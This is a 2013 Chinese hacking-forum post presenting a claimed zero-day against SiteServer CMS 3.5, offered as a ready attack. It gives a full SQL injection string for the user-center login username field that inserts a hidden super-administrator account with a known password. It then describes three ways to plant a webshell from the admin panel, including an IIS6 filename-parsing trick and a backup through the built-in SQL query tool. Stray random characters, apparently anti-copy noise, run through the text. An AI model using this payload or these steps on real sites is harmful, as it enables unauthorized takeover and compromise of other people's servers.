找回密码
 立即注册
查看: 3143|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版$ ^/ t0 X3 D! w$ K
% @  c, C9 z/ v
stieserver官网:www.siteserver.cn
6 v1 }9 v1 F; V) m
4 A' }, X  M+ u+ ^ $ I2 m- F" {* X; v+ D0 E1 q

7 M/ R/ x2 y; @( LEXP:
/ |5 `( M! w' F( Y+ |+ N2 k: W
$ X7 U8 n% F5 f. a: ?" I1 R直接访问UserCenter/login.aspx
/ U* _/ d: o/ a3 v/ E  W) q3 i. S) a7 W6 w

8 P* K1 i+ J* n8 g' K( T/ Z4 d6 \2 N) C' A* t
用户名处输入:
$ ?& M' ?) \6 b! L. b
3 ]9 P# c) F/ A0 j3 J7 q: D123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--+ X. ]0 Y* {% A+ [8 d
. L1 `& q; P- b/ x" n6 G& H

+ i8 o4 G8 `7 e  G" e
( S$ e. N) t+ Z  M密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。+ C. z* x; q" ?( c# o; k
; s- g* o& s4 C6 t7 o) a+ L, A
  C( W7 s, l8 ~+ M5 p! }

) V  U" Y: A  y, C$ t之后再访问后台SiteServer/login.aspx用插入的用户登陆3 u+ n- H4 v  V: p3 g. m  ]

  X/ b3 V3 L9 A* x  D
* G  U6 z- ?- x8 m& c* E" c5 _3 l! D9 j7 M6 y
后台拿webshell的三种方法:
' K% J7 W% j# c( `4 A6 x+ k# \- R6 ?  \9 m
一、1 A  q' J/ ?) E4 A" w& ~8 d7 k
) P( E# ]1 A  ~2 W$ i5 i! n5 g! J
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx  O. ^/ r0 c0 b0 E, j# c2 F' O

$ e- s  Q8 j8 f% y二、
/ [6 u$ o: U+ J' a; }0 J* {/ [% o
成员权限-》添加用户-》用户名为:1.asp
. P; o- l$ M, {" ]- D
1 F! W. R7 c- i/ M/ N! whttp://127.0.0.1/usercenter/
, N9 z* x& S/ `7 E* A5 {2 U- \1 V; ?7 @
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell# B! R( }/ G/ r5 x: C. \& c0 o( Y
, {+ _7 ?5 C- p8 C* e6 x
(ps:后台添加用户时不会验证是否含有非法字符)
1 T# I* B* W5 g) x( ~: i: L# y
4 K( K  t" Z$ h/ `4 l三、
& P1 x: d8 N0 V3 R3 C, `; f3 N% z' c) `4 x+ z5 S2 X
系统工具-》实用工具-》机器参数查看% N' w) Z, n/ {4 W( @
可以看到数据库类型、名称,WEB路径
/ x. c7 J* W" {; G& G+ o6 ^. |0 P' y$ c% l  {/ V
系统工具-》数据库工具-》SQL语句查询
7 }0 W5 T" D" [1 ^这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
; @, ]5 m8 G# y" E$ ~
( E$ r" K) ^( J  N% U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表